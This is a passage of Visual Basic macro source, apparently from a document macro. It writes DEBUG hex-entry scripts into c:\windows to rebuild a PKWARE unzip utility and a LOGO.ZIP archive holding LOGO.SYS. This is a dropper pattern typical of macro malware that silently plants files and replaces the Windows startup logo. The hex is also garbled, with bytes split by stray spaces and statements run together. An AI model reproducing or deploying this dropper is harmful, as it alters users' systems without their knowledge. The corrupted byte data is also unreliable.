28"Print #2, "E 09D0 54 4D 29 20 20 46 41 53 54 21 20 20 4D 69 6 E 69"Print #2, "E 09E0 20 45 78 74 72 61 63 74 20 55 74 69 6C 69 7 4 79"
Print #2, "E 09F0 20 20 56 65 72 73 69 6F 6E 20 32 2E 30 34 6 7 20"Print #2, "E 0A00 20 30 32 2D 30 31 2D 39 33 0D 0A 43 6F 70 7 2 2E"Print #2, "E 0A10 20 31 39 38 39 2D 31 39 39 33 20 50 4B 57 4 1 52"Print #2, "E 0A20 45 20 49 6E 63 2E 20 41 6C 6C 20 52 69 67 6 8 74"Print #2, "E 0A30 73 20 52 65 73 65 72 76 65 64 2E 0D 0A 00 5 0 4B"Print #2, "E 0A40 55 4E 5A 4A 52 3A 20 00 0D 0A 00 53 65 61 7 2 63"Print #2, "E 0A50 68 69 6E 67 20 5A 49 50 3A 20 00 57 61 72 6 E 69"Print #2, "E 0A60 6E 67 21 20 00 00 50 4B 00 00 45 72 72 6F 7 2 20"Print #2, "E 0A70 69 6E 20 5A 49 50 20 2D 20 55 73 65 20 50 4 B 5A"Print #2, "E 0A80 69 70 46 69 78 00 44 6F 20 79 6F 75 20 77 6 1 6E"Print #2, "E 0A90 74 20 74 6F 20 65 78 74 72 61 63 74 20 74 6 8 65"Print #2, "E 0AA0 73 65 20 66 69 6C 65 73 20 6E 6F 77 20 28 7 9 2F"Print #2, "E 0AB0 6E 29 3F 20 00 54 6F 6F 20 6D 61 6E 79 20 6 6 69"Print #2, "E 0AC0 6C 65 73 00 43 61 6E 27 74 20 4F 70 65 6E 3 A 20"Print #2, "E 0AD0 00 55 73 61 67 65 3A 20 20 70 6B 75 6E 7A 6 A 72"Print #2, "E 0AE0 20 5B 2D 6F 5D 20 66 69 6C 65 6E 61 6D 65 5 B 2E"Print #2, "E 0AF0 7A 69 70 5D 20 5B 6F 75 74 70 75 74 5F 70 6 1 74"Print #2, "E 0B00 68 5D 0D 0A 00 55 6E 6B 6E 6F 77 6E 20 63 6 F 6D"Print #2, "E 0B10 70 72 65 73 73 69 6F 6E 20 6D 65 74 68 6F 6 4 20"Print #2, "E 0B20 66 6F 72 3A 20 00 20 61 6C 72 65 61 64 79 2 0 65"Print #2, "E 0B30 78 69 73 74 73 21 20 4F 76 65 72 77 72 69 7 4 65"Print #2, "E 0B40 3F 20 00 43 61 6E 27 74 20 63 72 65 61 74 6 5 3A"Print #2, "E 0B50 20 00 66 69 6C 65 20 66 61 69 6C 73 20 43 5 2 43"Print #2, "E 0B60 20 63 68 65 63 6B 00 45 78 74 72 61 63 74 6 9 6E"Print #2, "E 0B70 67 3A 20 00 20 49 6E 66 6C 61 74 69 6E 67 3 A 20"Print #2, "E 0B80 00 46 69 6C 65 20 68 61 73 20 61 20 62 61 6 4 20"Print #2, "E 0B90 74 61 62 6C 65 00 10 11 12 00 08 07 09 06 0 A 05"Print #2, "E 0BA0 0B 04 0C 03 0D 02 0E 01 0F 01 03 07 0F 1F 3 F 7F"Print #2, "E 0BB0 FF 64 69 73 6B 20 66 75 6C 6C 00 00 01 00"Print #2, "RCX"Print #2, "0ABE"Print #2, "W"Print #2, "Q"Close #2End Sub
Sub LogoZip()Open "c:\windows\logo.dbg" For Output As #3Print #3, "N LOGO.ZIP"Print #3, "E 0100 50 4B 03 04 14 00 00 00 08 00 38 51 9B 28 1 7 D3"Print #3, "E 0110 09 49 36 12 00 00 36 F8 01 00 08 00 00 00 6 C 6F"Print #3, "E 0120 67 6F 2E 53 59 53 ED 9D 39 8F 2B C7 15 46 6 B 04"Print #3, "E 0130 07 8E E4 3F 20 28 36 6C 28 15 60 40 81 E1 4 4 81"Print #3, "E 0140 E0 50 89 52 45 0A 9D 39 B3 33 67 86 23 47 4 A 9D"Print #3, "E 0150 28 76 A0 DC 86 42 07 86 9D 71 E9 66 73 99 8 5 FB"Print #3, "E 0160 BE CC 0C 7D 6F 55 F5 CA 2E D7 13 6E BF 9E 9 E E1"Print #3, "E 0170 77 04 E1 91 C5 4B 72 FA 9B EA 66 73 58 F7 F 0 37"Print #3, "E 0180 BF FD 74 7F A3 98 4F 7F A2 D4 CF E9 DF 5F D 3 D5"Print #3, "E 0190 BF D0 FF 37 EA A7 7A 5C AD 6F D4 BF 3E 54 E A 9F"Print #3, "E 01A0 1F 9A AB 2D F3 8F 3A D3 7F EA 7C 56 00 80 F 7 CD"Print #3, "E 01B0 59 FD 4C CD D5 C7 2A 54 9F A8 7F AB CF D4 3 F D4"Print #3, "E 01C0 17 EA EF EA 2B F5 37 F5 8D FA AB FA BD FA 1 3 FD"Print #3, "E 01D0 F7 7B BA F4 0D 8D 7C 45 B7 7C 41 15 9F 51 E 5 27"Print #3, "E 01E0 74 8F 8F E9 9E 3F E3 BD 55 2D 68 1F 8E 3E 5 2 EA"Print #3, "E 01F0 BF BF 50 EA 87 5F 29 F5 FD E7 4A 7D F7 A5 5 2 DF"Print #3, "E 0200 7E AD D4 9F 7F A7 D4 1F FF A0 D4 EF FE AC D 4 D7"Print #3, "E 0210 DF 2A F5 E5 77 4A 7D FE BD 52 BF FA 41 A9 5 F FE"Print #3, "E 0220 47 A9 8F 22 A5 3E 5C E8 1F 45 3D 4C 66 8B D 5 66"Print #3, "E 0230 77 38 3D 9D DB DD A0 D7 1F DE DE 8F A7 3C B 4 DD"Print #3, "E 0240 1F 69 AC D5 09 C2 A8 3F 1C DD DD 3F 4C 68 7 8 B9"Print #3, "E 0250 5A 6F B6 BB C3 F1 78 7A 7C 7A 3E B7 5A ED 4 E A7"Print #3, "E 0260 DB 0D 82 30 EC F5 7A 51 16 BA 1E 86 41 D0 E D 76"Print #3, "E 0270 3A ED 56 EB FC FC F4 78 3A 1E 0F BB ED 66 B D 5A"
Print #3, "E 0280 2E 66 D3 C9 C3 FD DD 68 D8 8F C2 A0 D3 3A 3 F 9D"Print #3, "E 0290 8E FB ED 66 45 C3 E3 FB DB 61 BF 17 74 DB 3 4 76"Print #3, "E 02A0 D8 F1 D0 E4 E1 6E 34 88 C2 6E A7 F5 FC 48 5 5 EB"Print #3, "E 02B0 E5 7C AA 87 A8 AA 43 55 34 B6 DB AC ED 23 D E 8E"Print #3, "E 02C0 86 34 1E 06 5D 7A 4A 7E 46 7A CA C3 61 BF D F 6D"Print #3, "E 02D0 B7 DB CD 66 CD AC 0C FA F2 66 43 E3 BB FD F E 70"Print #3, "E 02E0 A0 8D D1 5B D3 EE 74 83 B0 D7 1F 0C 47 B7 7 6 6B"Print #3, "E 02F0 D7 9B DD FE F8 48 C9 74 28 99 C1 E8 8E 46 E 7 CB"Print #3, "E 0300 35 25 F3 F8 DC EA 74 C3 48 0F E9 FC CC 90 C E 4F"Print #3, "E 0310 0F 71 15 65 AA CB F8 AE 34 4A B1 CE F9 21 E 9 49"Print #3, "E 0320 0F 3A 3F 7E 4A 0E 30 B0 01 26 11 EA CB 1C 5 F C0"Print #3, "E 0330 F1 F1 C6 E8 FC 0E 7B CE 6F B9 98 53 50 0F 7 7 B7"Print #3, "E 0340 1C 82 0E 86 B2 E2 64 74 58 3A 3F 13 56 2E 3 F 93"Print #3, "E 0350 A8 CE 8F 42 E6 A1 4C F2 CB F9 6C 62 1F 31 E 2 FC"Print #3, "E 0360 32 BF 31 8A 6F 67 E3 5B 65 B1 01 EE 38 C0 7 4 36"Print #3, "E 0370 70 7E 91 DD DA C9 6C BE CC CD 22 1A A6 A9 C 5 F9"Print #3, "E 0380 D9 D9 A6 F3 B3 43 F9 48 79 88 E6 24 8D E9 4 9 19"Print #3, "E 0390 0D 28 D5 FB 31 0D 9B 09 68 7E 67 F4 94 36 4 0 3D"Print #3, "E 03A0 03 4D 82 31 61 32 FB 28 3E B3 31 34 17 CC F 4 A3"Print #3, "E 03B0 29 34 BE A7 A4 06 91 9E 6A 94 D5 81 27 91 9 D 59"Print #3, "E 03C0 F9 C9 66 67 64 27 33 23 F5 10 47 4A 55 3A D 3 95"Print #3, "E 03D0 7D 44 9E 7E 51 3A FD 4E 27 1B DF 86 E3 D3 A 9 2D"Print #3, "E 03E0 0D 36 41 1A B7 01 9E 4E E9 04 8C 78 02 DA A D 5D"Print #3, "E 03F0 E9 AC 28 19 0E 4B EF 9A 99 BD B5 63 F7 56 D F F1"Print #3, "E 0400 06 B8 E1 BD D5 5F 05 5C F0 DE EA AF 02 2E F 8 98"Print #3, "E 0410 E8 AF 02 2E F8 00 E8 AF 02 2E F8 CC CE 5F 0 5 5C"Print #3, "E 0420 F0 E9 8A BF 0A B8 E0 33 3B 7F 15 70 C1 67 8 0 FE"Print #3, "E 0430 2A E0 82 DF 9A F9 AB 80 0B 7E BF E6 AF 02 2 E F8"Print #3, "E 0440 5D 9D BF 0A B8 E0 B7 C0 FE 2A E0 82 FF B6 E 2 AF"Print #3, "E 0450 02 2E F8 0F 56 FE 2A E0 82 FF 38 EA AF 02 2 E F8"Print #3, "E 0460 6F 80 FE 2A E0 82 FF 2E ED AF 02 2E F8 EF D 2 FE"Print #3, "E 0470 2A E0 82 3F DD F0 57 01 17 FC 91 9B BF 0A B 8 E0"Print #3, "E 0480 8F DC FC 55 C0 05 7F 8A E9 AF 02 2E F8 53 4 C 6F"Print #3, "E 0490 11 70 C2 6B 0E BC 45 C0 09 7F B2 EE AF 02 2 E 78"Print #3, "E 04A0 19 87 BF 0A B8 E0 A5 31 FE 2A E0 82 17 0D F 9 AB"Print #3, "E 04B0 80 0B 5E 60 E5 AF 02 2E 78 1D 96 BF 0A B8 E 0 15"Print #3, "E 04C0 92 FE 2A E0 82 57 4D FA AB 80 0B 5E DC EB A F 02"Print #3, "E 04D0 2E 78 21 AA BF 0A B8 E0 C5 BD FE 2A E0 82 9 7 8D"Print #3, "E 04E0 FB AB 80 0B 5E 9D EF AF 02 2E 78 25 BE BF 0 A B8"Print #3, "E 04F0 E0 1E 0F 7F 15 70 C1 7D 33 FE 2A E0 82 9B B 4 FC"Print #3, "E 0500 55 C0 05 B7 22 F9 AB 80 0B 6E 1C F4 57 01 1 7 DC"Print #3, "E 0510 38 E8 AF 02 2E B8 BF D0 5F 05 5C 70 2F A6 B F 0A"Print #3, "E 0520 B8 E0 06 61 7F 15 70 C1 9D D3 FE 2A E0 82 D B CC"Print #3, "E 0530 FD 55 C0 05 37 A3 FB AB 80 0B EE F0 F7 57 0 1 17"Print #3, "E 0540 AC 8E F0 57 01 17 AC E8 F0 57 01 17 6C E3 F 0 57"Print #3, "E 0550 01 17 2C CA F1 57 01 17 2C CA F1 57 01 17 E C D8"Print #3, "E 0560 F1 57 01 17 AC 23 F2 57 01 17 2C C9 F2 57 0 1 17"Print #3, "E 0570 2C 0F F3 57 01 17 AC FA F3 57 01 17 AC FA F 3 57"Print #3, "E 0580 01 17 AC FA F3 57 01 17 6C 4F F4 57 01 17 2 C 54"Print #3, "E 0590 F4 57 01 17 EC 3A F5 57 01 17 6C 85 F5 57 0 1 17"Print #3, "E 05A0 6C 94 F5 57 01 17 2C 3A F6 57 01 17 2C 2B F 6 57"Print #3, "E 05B0 01 17 2C 3A F6 57 01 17 F0 3F CB 80 FF 59 0 6 FC"Print #3, "E 05C0 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2 C 03"Print #3, "E 05D0 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7 F 96"Print #3, "E 05E0 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F 0 3F"Print #3, "E 05F0 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0 C F8"Print #3, "E 0600 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 5 9 06"Print #3, "E 0610 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 F F 2C"Print #3, "E 0620 A3 46 FF F3 0D E1 AF 7A 0F DC 24 F8 6B 7F 2 C 35"Print #3, "E 0630 FA 9F 2F 36 E0 83 12 1C F7 15 71 93 C1 5F F D E3"Print #3, "E 0640 A8 D1 FF FC 62 F9 25 BC 87 00 AB F0 3F A7 3 F 54"Print #3, "E 0650 F6 C7 BB 48 E4 5D 67 41 5A 90 29 2D CF F8 E 2 F1"Print #3, "E 0660 D2 9B CB 7E 19 EF 25 3F B1 BF F8 5D B7 37 D E 54"
Print #3, "E 0670 5F 82 EF 9C DF 4D 86 4C 59 F1 D2 7B DD 81 2 B F0"Print #3, "E 0680 3F 97 6D 6F D9 76 94 E6 52 86 6B 73 0B 53 E A C7"Print #3, "E 0690 3C EF 4D FC 6F F5 F9 89 FD C5 AF 21 BF E2 A 5 CA"Print #3, "E 06A0 A8 C0 FF 5C FD 76 98 DB 2F AA 9A 99 9F D8 5 F 7C"Print #3, "E 06B0 93 C3 8C BD 64 7E 1F 14 8A 93 5B 33 3F 5F 6 5 54"Print #3, "E 06C0 E0 7F 2E CD E5 83 0C 99 BA 38 17 CF 66 DC D C DC"Print #3, "E 06D0 94 54 15 F2 2B DB CF 3F C8 51 52 57 7D 7E 6 2 7F"Print #3, "E 06E0 71 FA 53 E5 7E BE C2 46 E4 36 A3 F8 10 45 C A EB"Print #3, "E 06F0 8A F9 95 D4 99 92 C2 13 27 BF BA F7 90 5F 0 5 FE"Print #3, "E 0700 67 47 7E 22 4A 63 BE CC EF E5 A9 C0 FF 5C 4 B 7E"Print #3, "E 0710 17 B3 B9 21 54 E1 7F 4E 37 B4 BA DD A3 F8 A B 68"Print #3, "E 0720 6E 7E F0 17 4B 80 FF 59 06 FC CF 32 E0 7F 9 6 01"Print #3, "E 0730 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3 F CB"Print #3, "E 0740 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F 8 9F"Print #3, "E 0750 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 0 6 FC"Print #3, "E 0760 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2 C 03"Print #3, "E 0770 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7 F 96"Print #3, "E 0780 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F 0 3F"Print #3, "E 0790 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0 C F8"Print #3, "E 07A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 5 9 06"Print #3, "E 07B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 F F 2C"Print #3, "E 07C0 03 FE 67 19 B5 FA 9F A7 93 87 FB BB DB D1 7 0 10"Print #3, "E 07D0 F5 E2 27 3D EC B7 EB D5 62 36 1D DF DF E5 D E 47"Print #3, "E 07E0 D2 58 EE 73 D5 5D D2 E5 D3 6F D4 EF BB 46 F F F3"Print #3, "E 07F0 6C 3A 19 73 7E C3 41 3F EA 05 D6 BA 7A D8 6 D D7"Print #3, "E 0800 4B CA 6A 7C 7F 9B 7B 1F B4 9C 4F B3 9F 0B 1 E 76"Print #3, "E 0810 1B BB 4C 7B D8 EF 05 AA 39 D4 E8 7F 9E 4E 2 6 14"Print #3, "E 0820 09 4F 3F 7A DB 1D 74 52 6D 23 65 75 F1 19 7 E 21"Print #3, "E 0830 BF FD 36 CE 6F 10 85 41 B1 F8 05 A9 D1 FF C C D3"Print #3, "E 0840 8F F3 1B D0 09 67 D8 ED A4 DA C1 45 3E 2B 3 3 36"Print #3, "E 0850 9B 64 3F 17 A4 BD DC 2E D3 A6 FC 9A 24 0C A E D1"Print #3, "E 0860 FF 3C 19 73 7E 34 FD 28 BF A0 DB CE E4 37 9 B F8"Print #3, "E 0870 F2 DB 6D E2 FC FA C9 AE DF 08 6A F4 3F F3 D 1 8F"Print #3, "E 0880 F3 EB D3 09 27 ED BE A9 76 70 9E CF CA 8C D 1 2B"Print #3, "E 0890 4A E6 2A 1D FE 38 51 3A 78 52 7E 4D 12 06 D 7 E8"Print #3, "E 08A0 7F 1E 3F 70 7E FC EA 41 6F BB 3B AD 4C 7E D 3 B1"Print #3, "E 08B0 2F 3F 7E 91 36 97 68 F7 6D 52 7E 35 FA 9F F 9 C5"Print #3, "E 08C0 37 BE 4C BB 6F AA 1D 9C E5 B3 32 63 34 D9 3 2 57"Print #3, "E 08D0 E9 F0 67 97 69 53 7E 4D 12 06 D7 E8 7F 7E B 8 4F"Print #3, "E 08E0 F3 A3 DD 37 93 DF E4 21 9B 1F 9F 11 9A FC D 2 D7"Print #3, "E 08F0 8A CD 2A CE AF 97 7D E5 7E 79 6A F4 3F F3 B 9 5F"Print #3, "E 0900 7C 99 76 5F A3 1D E4 60 A6 F6 C0 66 6F E3 D 7 5A"Print #3, "E 0910 DE 7D E9 95 3A 93 DF C2 2E D3 A6 FC EA 12 0 6 BF"Print #3, "E 0920 0B 35 FA 9F EF EF D2 FC 68 F7 35 F9 25 6F 3 E 06"Print #3, "E 0930 49 7E 3B 9D 29 9F 50 67 5E 2B 96 49 97 4F A 3 76"Print #3, "E 0940 DF 3A FD CF 6F 92 1A FD CF 6F 92 2A FC CF D 7 4C"Print #3, "E 0950 05 FE E7 AB A6 02 FF F3 55 53 81 FF F9 AA A 9 C0"Print #3, "E 0960 FF 7C D5 54 E0 7F BE 6A 2A F0 3F 5F 35 15 F 8 9F"Print #3, "E 0970 AF 9A 0A FC CF 57 4D 05 FE E7 AB A6 0A FF F 3 35"Print #3, "E 0980 03 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F 0 3F"Print #3, "E 0990 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0 C F8"Print #3, "E 09A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 5 9 06"Print #3, "E 09B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 F F 2C"Print #3, "E 09C0 03 FE 67 19 F0 3F CB 80 FF 59 46 15 FE E7 2 0 0C"Print #3, "E 09D0 7B BD 28 8A FA 84 1D EA F7 23 D3 96 1D 04 D D B8"Print #3, "E 09E0 5F E3 F1 74 BA F8 A8 B4 DF 0B B9 95 E1 F1 A 4 FB"Print #3, "E 09F0 08 33 37 D0 D8 71 9F 76 2D 68 9E A8 2A 73 9 5 7B"Print #3, "E 0A00 C0 9E 69 8C 7B E3 E2 3A D3 DB 19 D4 D7 22 5 2 85"Print #3, "E 0A10 FF 99 F2 33 01 52 84 76 88 2F F3 BF 21 C7 9 7 E4"Print #3, "E 0A20 77 BC F8 A8 8F 1B 31 DB 67 CA 8A 1B 2C 33 F 9 B5"Print #3, "E 0A30 CF 3A 98 7C 7E 94 68 3E BF 24 F9 D5 C2 D6 E 9 DE"Print #3, "E 0A40 4E 6E 4E 6C D7 B4 AA BB 2A FF 33 05 98 ED C B 8D"Print #3, "E 0A50 22 7D 55 CF BE B8 5F E3 74 2C C9 2F 2C ED C 6 A2"
Print #3, "E 0A60 4C 4B 56 D5 F1 8C CC 5C CD F5 80 A5 F0 F4 5 3 ED"Print #3, "E 0A70 D6 B9 9E 65 A1 55 F9 9F 79 06 66 AE F6 7A 7 1 7E"Print #3, "E 0A80 14 5F 92 DF E1 E2 A3 BE 5E 59 37 96 AB C5 8 3 A7"Print #3, "E 0A90 5A E6 6A 90 ED 01 4B D1 F9 29 CA AF 96 75 8 D 55"Print #3, "E 0AA0 F9 9F 79 1F CE 5C ED F5 F8 AA 99 7D F1 AE 7 4 3C"Print #3, "E 0AB0 94 E4 17 5C B6 73 38 3B DC 28 BF EC DF 7A 7 3 3D"Print #3, "E 0AC0 60 29 F6 E8 F7 FC F4 58 C7 C2 A8 AA FC CF 4 1 90"Print #3, "E 0AD0 CB 2F E4 38 29 3E DA 93 DA AD 24 BF FD C5 4 7 7D"Print #3, "E 0AE0 7C A8 3A 3F D1 8E 99 19 73 76 B8 D1 EE 9B C F CF"Print #3, "E 0AF0 1E 38 F3 55 75 E7 57 8D BF B8 1B 04 41 E6 6 A 18"Print #3, "E 0B00 06 F6 95 97 E2 B3 7B D9 61 BF DF 6D D6 AB E 5 62"Print #3, "E 0B10 9E AA 0D 72 7D D4 16 67 87 1B BF 20 67 AE 2 6 3D"Print #3, "E 0B20 60 79 28 3E BE 3B C5 57 C7 C2 A8 AA FC CF D D 6E"Print #3, "E 0B30 2E BF 20 8E 4F 51 7C 49 7E BB 8B 8F FA 72 7 D D4"Print #3, "E 0B40 C9 20 9D 97 94 2D 8A A5 A9 96 CF AF F4 10 6 7 F2"Print #3, "E 0B50 AB 69 FA 55 E6 7F EE F0 BE 9A C2 E9 99 13 1 7 8A"Print #3, "E 0B60 CF 1E A5 F6 BB 92 FC CA 5F 43 F9 EC 2F 37 A 0 E7"Print #3, "E 0B70 9A 96 48 A4 CD 9A BC FB 96 DC 97 E2 6B D5 1 6 5F"Print #3, "E 0B80 25 FE E7 56 BB DD EE 70 80 34 09 ED 50 37 8 E 4F"Print #3, "E 0B90 51 7C 49 7E 5B BD FB 6A 0F 87 ED 64 E5 3E E A A7"Print #3, "E 0BA0 13 1F D8 B8 8F 30 7D 48 3E 55 DE AC 53 89 4 4 C7"Print #3, "E 0BB0 9E 4F 9B 2E 74 33 66 0E 9C BA DB 30 11 00 E 8 73"Print #3, "E 0BC0 67 6E 4E 7C AA 69 55 77 15 FE E7 73 AB C5 0 1 EA"Print #3, "E 0BD0 04 ED 10 A7 67 5E 44 29 3E BB 97 ED B6 FC 4 6 81"Print #3, "E 0BE0 8E 7E 5A 03 63 EB D2 37 1F 05 E1 CB C1 B6 E C 9B"Print #3, "E 0BF0 6B FA A5 22 6E 6C B5 F7 B5 6F 3E F8 E4 79 1 A D7"Print #3, "E 0C00 E9 73 E7 BA CE 5D 18 F8 9F 65 C0 FF 2C 03 F E 67"Print #3, "E 0C10 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 0 1 FF"Print #3, "E 0C20 B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F C B 80"Print #3, "E 0C30 FF 59 06 FC CF 32 E0 7F 96 51 AB FF F9 0D 5 2 A3"Print #3, "E 0C40 FF F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A 3 FF"Print #3, "E 0C50 F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 F F B9"Print #3, "E 0C60 04 B3 76 CF 0A 64 A3 64 30 23 1B FF BF 77 6 F 00"Print #3, "E 0C70 35 FA 9F 5D 14 F4 ED E9 2A 17 F6 17 97 DE A 3 41"Print #3, "E 0C80 D4 E8 7F 76 91 7E FA 9D E7 36 9D 92 CD A5 4 6 FF"Print #3, "E 0C90 B3 8B 32 7D BB 52 C5 2F 54 69 28 0D F0 3F F 3 97"Print #3, "E 0CA0 CF 5C 0C D2 E1 EF 55 7C 2E D8 00 FF F3 34 F F 55"Print #3, "E 0CB0 01 4C E1 DB 3F 1A 4C 03 FC CF D3 71 31 BF 6 5 C9"Print #3, "E 0CC0 17 D2 34 94 06 F8 9F F9 BB A3 B2 D7 37 49 3 7 C2"Print #3, "E 0CD0 2B A0 01 FE E7 C9 43 2E 3F 3E FB 33 97 1A F 6 55"Print #3, "E 0CE0 33 A5 BC AC FF 59 AF DD A3 DD 77 34 E4 46 2 4 33"Print #3, "E 0CF0 C6 8B FC F8 EC 79 D4 B0 6F 8A 2A 07 FE 67 1 9 F0"Print #3, "E 0D00 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B 3 0C"Print #3, "E 0D10 F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 F F 59"Print #3, "E 0D20 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C 0 FF"Print #3, "E 0D30 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 3 2 E0"Print #3, "E 0D40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 6 7 19"Print #3, "E 0D50 F0 3F CB A8 C8 FF 1C F5 FB 03 66 98 59 F3 C 8 0E"Print #3, "E 0D60 D9 28 B3 80 39 75 7A B1 04 CB 5C 1A F4 7B 9 7 4B"Print #3, "E 0D70 74 79 E1 46 DB 68 B1 72 E7 A6 6C FB CB 5C 8 D 72"Print #3, "E 0D80 02 59 33 76 3B 1A DA 76 7A D6 38 A9 F7 4F 3 5 FE"Print #3, "E 0D90 E7 5E 6A 8E 4D E0 F8 8C 86 D2 F2 F4 98 E4 B 7 98"Print #3, "E 0DA0 C7 F9 45 BD A0 78 C7 61 92 69 BA 94 48 F3 9 C F7"Print #3, "E 0DB0 2C 96 B9 2B 29 3F F3 83 D4 14 5F 35 FE E7 5 E AF"Print #3, "E 0DC0 77 B1 52 D9 18 8C 7B 61 AA 05 4C 8D 86 CB C 5 DC"Print #3, "E 0DD0 BA D6 FA 51 98 DC 1E 43 F9 D9 B1 42 7E 3C D 5 32"Print #3, "E 0DE0 57 CB 3C 8B 34 FD 74 7E 9D 4E 4D 02 DE AA F C CF"Print #3, "E 0DF0 C5 B1 BE 15 18 B3 08 D0 0E A5 FE E7 E5 3C 7 6 D5"Print #3, "E 0E00 A5 CB AE 52 06 49 A6 7E FF B3 2A C0 FE E7 4 4 41"Print #3, "E 0E10 59 07 15 F8 9F BB 79 F5 A9 26 F6 3F 1B 93 9 D B9"Print #3, "E 0E20 94 FA 9F 53 83 67 CE FF 6C EF 9B AE 5B 7B 4 7 FF"Print #3, "E 0E30 73 66 8C FD CF 5A AA AA 6A A2 02 FF 73 41 D D A9"Print #3, "E 0E40 B1 FE 67 BE 35 EF 7F 66 85 A2 62 85 A2 AD 4 B FC"
Print #3, "E 0E50 CF DB EC B2 49 9B 1F F7 D1 A4 8F 59 E6 7F 7 E 2A"Print #3, "E 0E60 64 3A E4 17 24 AD 50 7C 45 FE E7 82 3B 56 4 3 87"Print #3, "E 0E70 44 3D 29 D3 F8 8C FF 99 F2 5B 2A DA 7D 13 5 F 64"Print #3, "E 0E80 EC 2A 66 83 A2 B9 94 2E 3B 2D E4 F7 0E FE 6 7 A3"Print #3, "E 0E90 1F EF B2 B4 F6 B9 16 05 65 25 FE E7 B2 19 1 8 86"Print #3, "E 0EA0 7C 14 CB C4 A7 FD CF C6 E0 39 9F 26 BE CD E 4 35"Print #3, "E 0EB0 74 93 EC AB A9 FF 99 75 93 99 87 7C 07 FF 3 3 E5"Print #3, "E 0EC0 67 8F 25 AF CA FF 5C 1A A0 71 C8 A6 47 22 F 6 3F"Print #3, "E 0ED0 73 7E C6 E0 19 17 C5 05 E9 AA F1 D4 FF 9C E 6 C7"Print #3, "E 0EE0 4A 5E E3 7F 4E 5B 1B F8 C0 A9 0A F0 F4 33 9 7 5E"Print #3, "E 0EF0 97 FF 99 03 64 05 79 F6 95 24 EB BE 67 8C F F D9"Print #3, "E 0F00 BC 7A 8C E3 FC 92 53 E0 75 72 AA 92 9E 97 A C 12"Print #3, "E 0F10 27 AA 7E A9 88 05 A8 F6 BE A9 7A 76 99 BC 1 E F5"Print #3, "E 0F20 F9 05 C9 18 50 EB F2 17 57 E3 7F BE 56 AA F 2 3F"Print #3, "E 0F30 5F 2B 55 F8 9F AF 99 2A FC CF D7 0C FC CF 3 2 E0"Print #3, "E 0F40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 6 7 19"Print #3, "E 0F50 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 F F B3"Print #3, "E 0F60 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 8 0 FF"Print #3, "E 0F70 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 6 5 C0"Print #3, "E 0F80 FF 2C 03 FE 67 19 2F EB 7F 7E FD 34 C0 FF F C AA"Print #3, "E 0F90 69 80 FF F9 55 D3 00 FF F3 AB A6 01 FE E7 5 7 4D"Print #3, "E 0FA0 03 FC CF AF 9A 06 F8 9F 5F 35 F5 FB 9F 79 7 9 7C"Print #3, "E 0FB0 E6 EA 62 16 AF 85 4E D7 83 B3 94 F7 9E BF B D 82"Print #3, "E 0FC0 97 ED C6 AB C0 63 25 AF 6E 77 50 4D A1 7E F F 73"Print #3, "E 0FD0 98 6F 6E 49 BF BD 82 97 F2 66 6E 18 0D 72 D F FE"Print #3, "E 0FE0 31 4D 2C DB E7 A7 53 73 94 71 F5 FB 9F 0B C D 41"Print #3, "E 0FF0 E9 7A E6 C2 7A 70 D7 B7 7F F0 7A E9 B2 F1 9 7 A1"Print #3, "E 1000 7E FF 73 90 6F 4D 4B BF BD 82 DB 61 32 37 0 C FB"Print #3, "E 1010 65 F9 05 9D CB A6 85 97 A4 7E FF 73 B7 90 1 F EB"Print #3, "E 1020 DB 87 DC F3 C6 2B F1 33 37 A4 6D 84 19 F8 F 0 77"Print #3, "E 1030 31 F8 92 D4 EF 7F EE E6 3B 4B A7 E6 8B 8E 2 2 D3"Print #3, "E 1040 CD 96 B9 A1 A4 B5 B5 AC DB F0 85 A9 DF FF 5 C E8"Print #3, "E 1050 CC E5 EF 8E 32 97 B8 9B 2D 73 C3 A5 FE BE 7 4 46"Print #3, "E 1060 BE 30 F5 FB 9F 3B F9 D6 BE F4 DB 2B B8 1D 2 6 73"Print #3, "E 1070 43 71 B2 DD 35 F2 EB 90 EA F5 3F 73 67 A5 6 E 8D"Print #3, "E 1080 3C 25 6D 93 BC FB 9A 4B DC 8C 9A A9 2D 7C 7 B 05"Print #3, "E 1090 9F FD 99 4B A7 7C 1B E6 CB 52 AF FF 59 B7 9 6 EA"Print #3, "E 10A0 DE AA 43 9C C1 38 F9 A2 A3 F4 BC D8 9E 2A E B B3"Print #3, "E 10B0 E7 B8 65 DF 9C 4F 6B 2F C2 A1 41 C6 4C F8 9 F 65"Print #3, "E 10C0 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 F C CF"Print #3, "E 10D0 32 